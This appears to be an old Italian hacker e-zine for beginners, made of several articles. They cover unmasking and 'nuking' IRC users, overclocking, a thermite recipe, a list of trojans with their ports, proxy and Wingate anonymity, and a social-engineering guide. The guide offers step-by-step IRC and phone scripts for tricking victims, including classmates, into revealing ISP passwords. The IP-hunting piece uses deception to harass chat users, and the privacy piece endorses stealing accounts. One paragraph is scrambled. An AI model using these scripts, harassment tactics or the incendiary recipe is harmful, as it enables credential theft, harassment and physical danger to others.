non far sapere il proprio ip al lamer di turno puo' evitare fastidiose nukkate o robe varie ma c'e' anche il rovescio della medaglia. Cosa facciamo al lamer che rende invivibile la nostra chat se non riusciamo nemmeno a sapere il suo ip? Considerando che e' (con l'aggiornamento del winsock) e' + sopportabile un nuke che non un rompiscatole ecco il modo per aggirare l'inconveniente. Il server ha l'ordine di non restituire l'ip completo quando a richiederlo e' il comando /WHOIS ma non quando lo fa /WHOWAS. Quest' ultimo comando e' meno noto, ma assai utile. Permette infatti di conoscere l'ora in cui un certo nick si e' collegato nelle ultime 24 ore. Fin qui nulla di utile pero' whowas ci dice anche l'ip col quale il nick si e' connesso. Ok, il lamer ha l'ip dinamico come si fa? Si risolve il tutto con un po' di social eng.. quella roba li' e si convince (magari sfidando il suo sapere) il lamer a cambiare nick. In quel momento il suo nick e' storia e il comando /WHOWAS e' felice di informarci del suo ultimo collegamento e del suo ip COMPLETO che non e' di certo cambiato. Quindi o il lamer e' preparato o ha pochi secondi ancora prima di dire addio alla rete. </Integrazione ad opera di [MAX]> NOTA se il lamer si e' collegato per un po' e si ricollega senza scollegarsi da Internet il attuale anke se non ha cambiato nick! :) Quindi se il /WHOWAS ci da' un orario recente lamer, con tutta probabilita' il suo IP e' lo poi scollegato dal server e vi /WHOWAS ci dara' il suo ip per l'ultima commessione del stesso! ^_^ B- DCC: quando stabilite una connessione dcc con il qcn ottenete il suo ip ...quindi se volete individuare il lamer convincetelo ad aprire una sessione dcc chat o a spedirvi qcs in dcc e avrete il suo ip! Un metodo simpatico e' questo: clonatevi per due minuti (lo so che i cloni non sono consentiti ma e' per una giusta causa! ;-) ovviamente usando la java chat e un bel proxy come spieghero' piu' tardi e fingetevi ad es. una ragazza ...dopodiche' non ci vorra' molto a convincere il lamer ad chattare in dcc con voi :)))))))) In fondo avete tante cose da dirgli...e da mandargli... ...hihihihi..attenzione agli interventi divini! ^_^ C- Diventate IrcOp o vi fate amico un IrcOp :) e ve lo fate dire da lui l'ip!!! D- {Proposto da Buttha}: minacciate ChRome di non scrivere piu' articoli su NetRunners se non si decide a rivelarvi come ca**o fa a sapere tutti gli IP!!! 8))))))))) P.S. Ovviamente, il metodo piu' godoso e' quello D, ma non tutti possono attuarlo per forza di cose... :-\ 2.)NASCONDERE IL PROPRIO IP Poiche' l'uso di Wingate e simili non e' consentito...secondo me per nascondere l'ip ci sono principalmente queste due vie: A- Usate una java chat attraverso uno o piu' proxy. Una java chat ottimamente funzionante per collegarsi alla rete di Azzurra e' www2.leonet.it. B- Vi prendete una shell free o meno (10$ al mese) che consenta ircII e la usate :) Di free shell attualmente funzionanti, disponibili per gli Italiani e che consentano di chattare su IRC non ne conosco, se voi le conoscete e mi informate mi fate un grandissimo piacere ( [email protected] ). C- Backdoor, etc. (ma visto che questa e' una rivista per newbie...limitatevi ai primi due modi :) In ogni caso, che ricorriate o meno a questi stratagemmi, evitate nel modo piu' assoluto di cambiare nick (magari quando andate in Away) o di scollegarvi e ricollegarvi al server durante lo stesso collegamento Internet...altrimenti il /WHOWAS vi punira'... P.S. Per i newbie: clone = se aprite piu' volte il vostro client Irc, ad es. mIRC, e vi collegate allo stesso server o alla stessa rete con nick diversi e chattate ad es. su uno stesso canale con 4 o 5 identita' differenti...ecco, vi siete klonati ^_^ Bot = Batch Oriented Task e' semplicemente un client programmato per rispondere in modo determinato a certi input...E' vietato su quasi tutte le reti... Se volete averne uno dovrete trovarvi prima una free shell che li consenta... Io non ne conosco, se voi si': informatemi per piacere ^_^ . --Ringraziamenti: Ringrazio tutti quelli che in maniera diretta o indiretta mi hanno aiutato a scrivere questo infimo articolo: innanzitutto grazie ankora Max, grazie Ramesse per l'idea della Java chat e poi voglio ringraziare N0bodY88 perche' ha il coraggio di mettere nella sua zine questa merda (hhihihihihi ;), e il mitico (^_^;;;;) ChRome per la sua presenza digitale sulle rete....Hihihihihi ...cromino come faremmo senza di te? ;-) Per chi non lo sapesse il canale #chrome esiste veramente...hihihihihihi.... fateci un salto se vi va... ^_^ Infine un ringraziamento particolare a tutti quelli che ascoltano pazientemente le mie ca**ate su IRC ^_^ e al carissimo RigoR per il supporto morale e non che mi da'! Ciao e arrivederci alle prossime avventure! 8-]°°°°°° Newbie 1.1 sempre piu' niubbi 8)))))))) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ **************************************************************************** *IL MIGLIOR MODO PER .FONDERE TUTTO* di ULNTWH99 ( quanti mi hanno chiesto * * l'origine di sto' nick )* **************************************************************************** 4 finocchi crudi (pure schifosi) 2 pomodori 1 fetta di prosciutto perche' l'altra se l'e' spappata il mio gatto :( 1 carota .che volete e' il mio pranzo di oggi . musica ascoltata ultimo album offspring (nobo te lo devo dare) Eccomi qua il vostro insegnante newbies/hardware.dunque oggi cosa faccio ? SE NON LO SAI TU . Si si okki.sto per descrivervi il modo piu' sottile per poter "fondere tutto" senza il bisogno dell'ormai obsoleto GH uno dei miei tanti virus che pero' e' stato creato con "l'innocuo" intento di distruggere gli HD (state tranquilli non l'ho ancora dato in giro e mai lo faro' .ce ne sono gia' troppi) ;) DIO CHE PALLE NON HO SCELTO DI LEGGERE QUESTO ART. PER SENTIRE LE TUE PRODEZZE !!! Va bene ok ok ! Passiamo subito al sodo . Parlero' dell'overclock (nobo88 pensaci un po' sopra) perche' e' il modo piu' insicuro per sfruttare al massimo la CPU nel modo piu' economico esistente . Allora io personalmente ve lo sconsigli questo procedimento ma onestamente (senti un po' da che pulpito viene la predica ) con un bel pentium 450 Mhz con 512 Mb di Sdram Mainboard Asus P2B-S e HD Quantum Viking 2 ultra2 36 Mb/sec dichiarati 16 reali .non ho molti di questi problemi :) . Comunque sia se vi si fondesse tutto perche' avete beccato la partita poco resistente di processori o peche' avete sbagliato non venite a rompere le balle a me .azz ci mancherebbe . I processori sono progettati per una certa velocita' ma c'e' sempre un certo margine ulteriormente sfruttabile . In questo art voglio illustrare quali sono le tecniche ed i rischi ai quali si va in contro : Per prima cosa cerchiamo di chiarire il concetto di "clock" , che e' alla base dell'overclock sia del funzionamento di un qualsiasi pezzo elettronoco sincrono . Per misurare la "velocita' " di un clock , piu' precisamente la frequenza , si usa come unita' di misura l' "Hertz" ed i suoi multipli . Ammettiamo che il nostro clock dia 4 impulsi al secondo , la sua frequenza risulta essere di 4Hz e , tra un impulso e l'altro , trascorrono 0.45 secondi, cioe' 250 millisecondi . Nei nostri PC c'e' un clock base , quello della scheda madre , che viene moltiplicato e diviso in modo da ottenere vari segnali sincronizzati che scandiscono il "ritmo" per tutte le periferiche . Tale clock detto anche velocita' di BUS o della mainboard puo' variare dai classici 66 al centinaio di Mhz (nota : avere il bus piu' veloce significa avere maggiori prestazioni nelle periferiche isa e quelle pci che non mi fermero' a descrivere) . Questo segnale di clock viene diviso tipicamente in due , cioe' dimezzato , in modo da ottenere il clock del bus pci essendo esso un bus sincrono . Infatti il pci odierno non potrebbe superare i 33 Mhz . Il clock della mainboard viene acora diviso per ottenere frequenze dell'ordine dei 10/12 Mhz : tale segnale serve per sincronizzare il merdoso vecchissimo bus isa . Alla frequenza della mainboard viene sincronizzato anche l'accesso alla memoria RAM e , nelle schede madri con socket 7 , anche alla memoria cache di secondo livello saldata suula scheda . E' la CPU ? DOVE CAZZO LA LASCI RINCOGLIONITO ? Calma , calma arrivo .La cpu e' dai tempi del processore 80486 Dx2 di intel che riceve in ingresso il clock di sistema e lo moltiplica . Per esempio un 486 Dx2 a 66Mhz deve essere montato su una mainboard a 33Mhz, la cpu moltiplichera' per 2 tale clock e internamente lavorera' a 66 Mhz . FINE PRIMA PARTE ULNTWH99 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ IP ROUTING ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ IP ROUTING: Se si utilizza una connessione diretta ad internet tramite windowz con due schede di accesso remoto da e verso l'esterno , ad esempio una il R.A.S [Remote Accesss Service] e l' altra per internet , il metodo migliore consiste nell' aumentare il livello di sicurezza della macchina consiste del disabilitare appunto l' ip routing RESISTENZA PASSIVA: Per aumentare notevolmente il vostro livello di sicurezza e' opportuno utilizzare , secondo me , proxy e firewall: I proxy sono dei particolari software che si frappongono fra le applicazioni di rete e la rete stessa , dediando e filtrando la rete stessa , essi funzionano in due modi: A livello circuito A Livello applicazione I firewall servono a bloccare l' entrata a determinate porte [scusate la definizione] ed utilizziano diversi protocolli di trasporto [ o meglio li bloccano , bha oggi le def. non sono il mio forte ] i protocolli citati sono : UDP [User Datagram Protocl] ICMP [Internet Control Message Protocol ] TCP [Trasmission Control Protocol] e poi abbiam le varie porte 25 telnet 512 , 513 RSH RCDM 119 NNTP 110 POP3 80 HTTP 520 RIP 67 e 69 BOOTP e TFTP 79 FINGER e molto altro ... COME METTERE IN UNA BLACK LIST IL TUO PEGGIOR NEMICO: ALcuni programmi consentono di trasferire automaticamente i msg indesiderati nel '' cestino '' , questi prog si appoggiano a delle care black list Puoi crarne una personalizzata e ci sono cari provider che ti danno questa bella opportunita': ecco alcuni link: http://www.idotal.com/prefferedmail/. http://maps.vix.com http://www.bitgate.com/spam/ http:/www.webeasy.com:8080/spam/ PUBBLICITA' : allora per farla diciamo che mi hanno un bel poco costretto ma magari ci ricavo un poco di spazio per l' e-zines for free allora ALPHASAT wwww.alphasat.com realizzazione domini a partire da lire 129000 con 3mb di spazio telnet ftp email ftp IL GRANDE FITZBAN SI FA' SENTIRE [sei mitico] TERMITE: Okkey, siamo qui per il primo di una lunga {spero} serie di articoli, ovviamente tutti dal punto di vista TEORICO, visto che sono tutte cazzate PIUTTOSTO pericolose da fare, per cui : DON`T TRY THIS AT HOME. Dopo questa dovuta precisazione partiremo con un articolo sulla termite, che non e` il simpatico insetto che potete somministrare ai mobili del vostro odiato vicino per ridurglieli in segatura in poco temp[comunque anche quest e' un'idea da predndere in considerazione]o, ma un tipo di esplosivo poco conosciuto che permette di scaldare il metallo fino a ridurlo in tanti piiiiiiccoli rivoletti di metalo fuso. La termite si ottiene miscelando in proporzione 2,7:1 polvere di ossido di ferro [un modo elegante per dire ruggine] a polvere di alluminio [ottenibile raschiando con la vostra fida lima un bella lattina di alluminio]. Miscelate il tutto in un cilindretto di cartone e date fuoco al tutto, ma attenzione, per accendere il tutto serve qualcosa di MOLTO caldo, come l'accensione di un tocchetto di magnesio. Alla Prossima Fizban ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ TROJAN FOR DUMMIES ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ IMPARATE TUTTI I TROJAN IN 4 MINUTI 35 SECONDI E 4 DECIMI...... mumble...mumble... come iniziare vediamo un po'.... Non so' se questo articolo lo leggerete mai e non so' neanche dove, nel caso, lo stiate leggendo!!! (l'ho promesso ha 14 persone!!!) :)))))) Iniziamo...la leggenda del cavallo di troia spero la conosciate tutti..... una statua di legno di grande mole, nel cui interno, vennero nascosti i migliori guerrieri greci, e che fu abbandonata sotto le mura di Troia. I Troiani ingannati da Sinone la credettero un'offerta votiva e introdussero il cavallo in citta': i guerrieri greci ne uscirono durante la notte, aprirono le porte di Troia e provocarono la caduta della citta', che aveva resistito dieci anni all'assedio.....faccio il Liceo!!!!! Pensate ad un'amministratore che c'ha messo dieci mesi per sistemare il suo NT(capita, capita) e di colpo il Sinone 19enne del cavolo mette tutto all'aria!!!!:)))) Ce ne sono tanti in giro, ce ne sono da sempre ma con il boom del "bo"... ve ne elenco qualcuno che ho studiato personalmente ed altri per sentito dire...per informazioni, problemi, commenti [email protected] BACK ORIFICE ENIGMA MIRC DMSETUP BACKDOOR SYSPPROTECT98 PICTURE TELECOMMANDO PHASE-0 NETBUS REMOTE WIN SHOUTDOWN GATECRACHER ICKILLER DEEP TROAT WINHELPER NETPATCH MASTER PARADISE GIRLFRIEND ANGEL DEVIL WARTOOL GJAMER bhe' lo sapete controllate /windows/system....e il regedit la porta e' udp 31337 e' un setup.exe che da permesso di lettura e scrittura su una parte di c: e' bersagliato, ci sono decine di script che ti fregano ma basta un occhiata per trovarli di solito crea diverse directory fasulle, e' uno dei piu' vecchi e piu'....:)(occio ce ne sono circa 4 versioni) si installa con il nome di notepad. exe o notepa.exe quindi se non vi funziona o ne avete 2...zzi vostri dovrebbe apparire come un setup e crea un file chiamato system.eo(bha') e funge da server senza alcuna protezione vi fotte la vostra password di accesso a internet(cache) e la spedisce a un tizio in mail (forse una software house di antivirus hihihihih) il server e' una dll da 266k ed il client non l'ho provato....sorry vi faro' sapere e' tipo netbus(.) carino e con molte opzioni per il reg, il server e' un .exe da 294k E' piu' famoso del BO, le versioni piu' note sono la 1.6, la 1.7 e la 2.0 pro b. Apre la porta tcp 12345 o 12346 ma e' facilmente riprogrammabile. il server e' RmtEwxS.exe di 262k da le opzioni di est, reboot e shoutdown, e' possibile settare una password. e' completamente scritto in visual basic, il server e' BUG.exe di 56k, ha le funzioni piu' comuni come apri/chiudi cd, apri webbrowser, start screensaver, chiudi windows, cancella file e dir, format, killwin, ... e qualcos'altro.... e' simile al netbus l'interfaccia grafica lascia un po' a desiderare i comandi sono gli stessi il server si installa come explorer.exe credo che sia della stessa crew del BO e' facile e molto simile al netbus a me e' sembrato un po' piu' lento. altro trojan per mirc riscrive il mirc.ini non l'ho mai incontrato ma credo che installi un server ftp sulla porta 31377(BO) e' molto simile al netbus, credo che, grazie ad un monitor sul server possa essere usato tranquillamente come RAT e' molto carino...logga tutti i tasti premuti in ogni finestra di windows.....quindi anche le password d'accesso e rimane in ascolto del client sulla porta 21554 installa un server ftp che da' completo accesso all'HD della vittima (credo senza pass) lo sto scaricando ma credo che sia del genere netbus visto quanto pesa!! si installa come un explorer.exe ed al riavvio cancella tutti gli exe e le dll apre la porta tcp 12076 con un server ftp e www ....credo che per ora sia tutto non me ne vengono in mente altri. So' che vi sapettavate di meglio ma ho detto "for dummies"....a presto e in bocca al lupo alla zine!!!! Nietzsche "o grande sole cosa saresti tu se non ci fossi io su cui risplendere!!!!" ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ PRIVACY QUESTA SCONOSCIUTA ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ La privacy purtroppo e' un optional nel mare burrascoso di internet, qualsiasi cosa voi facciate la parola d'ordine nei sistemi remoti e' loggare loggare loggare..... vediamo un po' cosa fare per "mascherarsi in Internet". Dovete sapere che gli amministratori di sistema possono, ogniqualvolta accedete ai loro siti, rintracciare importanti informazioni su di voi.... quale il vostro IP (vera e propria carta d'identita' in Internet) la pagina da cui provenite, (marketing rules....) il vostro Sistema Operativo, il vostro browser e in alcuni casi anke l'e-mail.....per non parlare di alkuni recenti bug scoperti che sembrerebbero in alcuni casi addirittura permettere al sysadmin di rintracciare la password per accedere alla vostra posta elettronica.....(!) Detto questo......la domanda sorge spontanea.....kome restare nell'ombra? (il perche' sono fatti vostri;) Il metodo migliore a parere di chi scrive e' quello di stillare un account ...bhe'..non e' molto educativo ed in piu' puo' essere costoso se abitate ad Aosta e vi dovete collegare a Palermo.....ma in questo modo sarete sikuri ke le vostre malandrinate resteranno impunite......kome "prendersi" un account altrui?....bhe'.....questo e' un'altro film...... forse ne riparleremo un'altra volta.............. dunque passiamo al metodo che io considero un vero e proprio uovo di Colombo: Il Proxy. Avrete notato ke fra le opzioni del vostro browser (Netscape, Micro$oft o altro che sia......) c'e' una simpatica voce che dice appunto "Server proxy" e' li' ke dovete inserire l'indirizzo del proxy che avete trovato assieme alla relativa porta.... Ma andiamo per ordine, cosa e' un proxy?...kome lo trovo? Di solito quando volete vedere on-line una pagina internet quello che accade e' semplicemente ke il vostro provider kiede al server di destinazione la pagina in questione e poi ve la spedisce nel monitor..... (come sono bravo a far le cose facili.....) kosi' pero' i server entrano in contatto e il richiedente (il nostro provider...) "si presenta" al server di destinazione lasciando preziose info su di noi..... utilizzando un proxy invece i 2 server restano divisi perke' il nostro provider chiede la pagina al proxy....poi quest'ultimo chiede la pagina al server di destinazione, (lasciando cosi' info su di lui e non su di noi!!!!!) e infine la manda al nostro server....... spero di essermi spiegato....il proxy e' un semplice mediatore....ovunque ci sia possibilita' di utilizzarlo (ci sono proxy abilitati anke per servizi Gopher,ftp etc. e non solo per http......) abbiamo il vantaggio di non essere riconosciuti........ Il proxy opera su porte standard quindi e' facile trovarlo usando uno scanner (prg ke fissata una subnet tipo 194.243.32.X, esamina l'intera classe e rilascia gli IP ke hanno una determinata porta aperta)esattamente alle porte 81,3128,8000,8001,8080 (anche se ce ne sarebbero altre.......). Per trovare un proxy si puo' chiedere molto piu' semplicemente aiuto anke a www.bikkel.com/~proxy che in questo momento e' on-line e vi fornira' alcuni indirizzi di proxy free e anonymous. Per provarvi poi ke siete realmente anonimi, andate su www.rootshell.com (bhe'...questo sito vi fara' comodo anke per molte altre cose;) o in una chat ke scopre gli IP dei chatters...se tutto e' andato bene potrete vedere il vostro IP spooffato (come si dice in gergo).....ovvero il vostro VERO IP e' nascosto e per esempio nessuno potra' nukkarvi..... le porte dell'hacking vi sono aperte.........attenti che non siano sbarre pero'......non andate a formattare gli Hard Disk della NASA o della CIA perche' il proxy server sara' costretto, su esplicita richiesta, a rilasciare il vostro IP (se tiene tutti i log naturalmente;)......con quello che ne consegue....*grin* comunque visto che siete newbies il pericolo non c'e'......hihihihihihihi hihi........ma andiamo avanti. molto simile e' il funzionamento del Wingate che e' un software per condividere, fra piu' computer, un collegamento ad Internet..... a differenza del proxy che talvolta abbisogna di password, il Wingate e' sempre libero e per default neanche logga gli ip di chi si connette... incredibile no?... Aprite il vostro Client Telnet e connettevi semplicemente all'IP del Wingate (porta 23); da ora in poi per quella sessione telnet avrete l'IP del wingate...... se siete dei veri e propri S.Tommaso della rete provate pure ad aprire da li' la vostra shell dell'universita' e guardate il vostro IP.....dovrebbe essere quello del Wingate, se non avete una shell o siete cosi' fuori corso che il Sysadmin dell'Uni ha deciso di cancellare il vostro account, allora digitate l'IP di un server seguito da 25 (sarebbe la porta dove volete connttervi) e poi scrivete "helo" senza virgolette......se il server dispone di servizio sendmail (quasi tutti...) vi rispondera' con il vostro IP..... fate la prova con e senza Wingate.....vedrete che portento....hihihihihihihi. Per trovare un Wingate infine, esistono vari programmi in rete....io uso Wingate 2.2 e mi sono trovato bene......voi fate come volete......se non siete neanche capaci di cercarvelo significa che la vostra tastiera e' solo una macchina da scrivere...lasciate pure perdere l'hacking per ora....... hihihihihhihi...... e con questo ho concluso, se avete dei commenti, delle domande o vi scappa da vomitare, fate tutto al mio indirizzo di E-Mail [email protected] .....IL vostro ALBY....... ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ :::::::::::::::::::::::::: | ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Guida di base al S.E ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : xx/2/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: Û°°°°°°°°° ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ; ÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ Û Û GUIDA DI BASE Û Û AL Û Û SOCIAL ENGEENERING Û Û ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛ di ElectroRipper Il social engeenering e' un'attivita' utile e divertente, che consiste nel fingere di essere qualcun altro. Le applicazioni del social engeenering sono innumerevoli e vanno dalla ricerca di informazioni riservate al semplice scherzo telefonico... Se vuoi dedicarti a questa sana e divertente attivita', devi essere : A) Creativo. Difficilmente troverai gente cosi' scema da credere a una scusa ancora piu' scema. B) Veloce. La conversazione potrebbe prendere una strada che non avevi previsto. In quel caso attaccare il telefono per pensare a un nuovo piano non fara' che mettere in allarme la vittima, che sicuramente non caschera' piu' nel tuo tranello. Veloce dunque nel trovare risposte coerenti e credibili alle domande impreviste, cercando di riportare, se possibile, la conversazione sulla strada giusta. Il mezzo piu' comune per praticare il social engeenering e' ovviamente il telefono, ma anche l'IRC e' terreno fertile per le malefatte di questo genere. -IL TELEFONOEcco alcune regole di base se devi usare il telefono : -Possibilmente non chiamare da casa tua. Meglio una cabina pubblica -Se sei un ragazzo non tentare di camuffare la voce per sembrare piu' grande : chiunque con un minimo di intelligenza ti scoprirebbe subito. Molto meglio usare la tua voce vera, o al massimo modificarla con un camuffa-voce (non quelli che la rendono semplicemente non identificabile) -Informati prima di chiamare. Fai un piano A (default) e un piano alternativo per ogni piega che potrebbe prendere la conversazione (per quelle che riesci a prevedere. Per le altre, come ho gia' detto, serve solo velocita') -Se stai parlando con un puoi far finta di avere di essere indignato per la gente, dicendogli di operatore, e le cose si stanno mettendo male, molta fretta, e se non ti va bene farai finta la sua incompetenza e le sue maniere di trattare voler parlare con un suo superiore -IRCEcco invece qualche dritta per il S.E. in IRC : -Non farlo su canali che frequenti abitualmente -Non farlo su canali come hacker.it, ma dove sai di trovare polli -Non usare il tuo solito nick. Stessa cosa per l'username. -Usa un abbonamento che non sia quello che usi di solito per collegarti -ABBONAMENTI GRATUITIEcco varie tecniche di Social Engeenering utili per soffiare le password di ISP account degli altri. -METODO 1Passo direttamente all'esempio..... <ElctRipper> Senti, sono nuovo, potresti farmi un piacere ? <P0110> Certo, spara. <ElctRipper> Ho notato che quando scrivo la mia password seguita dal codice 266 esce scritto !INVENTATEVI UN MESSAGGIO!BOH! <P0110> Mah, non so perche' <ElctRipper> Potresti provare a farlo anche tu ? Poi mi dici se esce anche a te. <P0110> Ok, ora ci provo. Come si fa il codice 266 ? <ElctRipper> Tenendo premuto ALT digita 266 sul tastierino numerico e poi rilascia ALT <P0110> pippo <---- (questa e' la sua password!) In pratica inserendo il codice 266 e' come se avesse premuto ENTER, e vi avesse detto la sua password direttamente. Ovviamente il social engeenering dovra' continuare anche dopo, altrimenti sospettera' di voi.... <ElctRipper> Allora ? <P0110> MA CAZZO ! E' USCITA SCRITTA ? <ElctRipper> No, dico, ti e' uscito quel messaggio ? <P0110> no <ElctRipper> Cazzo, ma allora perche' a me esce ? Forse ho uno script di merda ? Che dici, dovrei cambiarlo ? tu quale hai ? <P0110> Dynamirc <ElctRipper> Mi dici dove posso prenderlo ? Gia' non ci capisco niente di IRC, poi con questo script schifoso..... Ecco fatto. Se invece usa linux, al posto di alt-266 potete dirgli di premere ctrl-J dopo la password.... di norma un utente di linux dovrebbe sputarvi in faccia, ma oramai questo fantastico os se lo stanno istallando cani e porci, convinti di sembrare alquanto kewl, e poi non sanno neanche in realta' che cos'e'... Basti pensare che piu' di una persona mi ha fatto domande del tipo : "A che serve il programma Linux ?" oppure "Come installo Linux ? Sul cd non c'e' l'INSTALL.EXE !!!". Mi dispiace, ma vi assicuro che non sto scherzando... (((((((((((((((((p o v e r a i t a l i a)))))))))))))))))))) -METODO 2Trova un pollo, e comincia a parlare con lui. Una volta che siete diventati 'amici', invitalo su un canale che avrai aperto precedentemente. Su questo canale, oltre a te, ci sara' un tuo clone, che avrai battezzato con un nome da bot, tipo <GUARDIANO>,o <UMILESERVO>, o <TROIONA>, fai tu. Dirai che hai creato questo nuovo canale (oppure, meglio ancora, che era gia' un canale conosciuto e tu lo hai takeoverato), e hai messo un bot. Gli chiedi se vuole aiutarti a mantenere il canale, dopodiche' gli dici che per farsi oppare dal bot serve una password, che gli darai (va bene qualsiasi cosa). Quando vede che in realta' non lo oppa affatto, farai finta di restare sorpreso e di pensare all'errore, dato che, come tu dirai, a te ha funzionato. Dopo un po' ti "ricorderai" che il bot oppa solo utenti gia' conosciuti, e che quindi deve registrarsi al bot, prima di poter usare la pass per essere oppato. Se ti chiede come digli che deve dare un messaggio al bot di questo tipo : /msg GUARDIANO nick user password Dove nick e' il suo nick (per allontanare il sospetto di quello che ci interessa realmente) e user e password sono ovviamente quelli del suo account. Se lo fara' avrai un nuovo abbonamento. Dopodiche', appena dice la password stronza che gli hai detto, fagli dare l'op dal tuo clone, in modo che non sospetti di niente. A questo punto aspetta che se ne va, dopodiche' leva il clone. Il giorno dopo lo cercherai e gli spiegherai che avevano ritakeoverato il canale, che la tin lo ha sgamato con il bot collegato al suo server, o una stronzata simile, per non farlo sospettare -METODO 3Questo metodo utilizza il telefono, quindi devi prima trovare il numero di telefono della vittima. Conviene allora cercare la vittima, ad esempio, tra i propri compagni di classe, dei quali si conosce il numero di telefono. Dovrai anche conoscere il suo provider e il suo username (facile) dopodiche' potrai telefonarlo...... ElctRipper - Buongiorno, qui Italia on Line. Vorrei parlare con il titolare dell'abbonamento numero [inventatiunnumero] Padre di Giorgio - Uhm, un abbonamento internet, allora e' mio figlio, ora glielo lo passo. Giorgio - Pronto ? ElctRipper - E' l'utente numero (inventati un altro numero) ? Giorgio - Uhm, non lo so, pero' ho un abbonamento. ElctRipper - Dunque, aspetti...Allora, il suo username e' <username>, giusto ? Giorgio - Si ElctRipper - Stiamo trasferendo i dati degli account su un hard disk piu' capiente, e quindi stiamo avvisando gli utenti. Lei ci da l'autorizzazione a trasferire il suo account ? Giorgio - Ma che cambia ? ElctRipper - Niente. Anzi, avrebbe un accesso piu' veloce ! Giorgio - Ah, allora si! ElctRipper - Allora ok. Ora pero' devo essere sicuro che lei e' davvero l'utente numero (...). Mi dovrebbe dire la sua password. Giorgio - pippo ElctRipper - Uhm, non mi sembra Giorgio - ma sono sicuro ElctRipper - Ah si, mi scusi, avevo letto quella dell'utente precedente Grazie di tutto, e buona giornata. Ecco, un nuovo abbonamento. Fare finta di non ritenere valida la password e' necessario per un semplice motivo. Se ti ha dato una password falsa si corregera' subito. Se ti ha dato quella giusta invece protestera' e tu ti "accorgerai" di aver sbagliato, "controllando" di nuovo la password e scusandoti dell'errore. OK ! Per questa volta e' tutto. Ovviamente il social engeenering si usa per molte altre cose, anche se questa sembra essere l'applicazione piu' popolare negli ultimi tempi. Ad ogni modo lascio il resto alla vostra fantasia. ElectroRipper 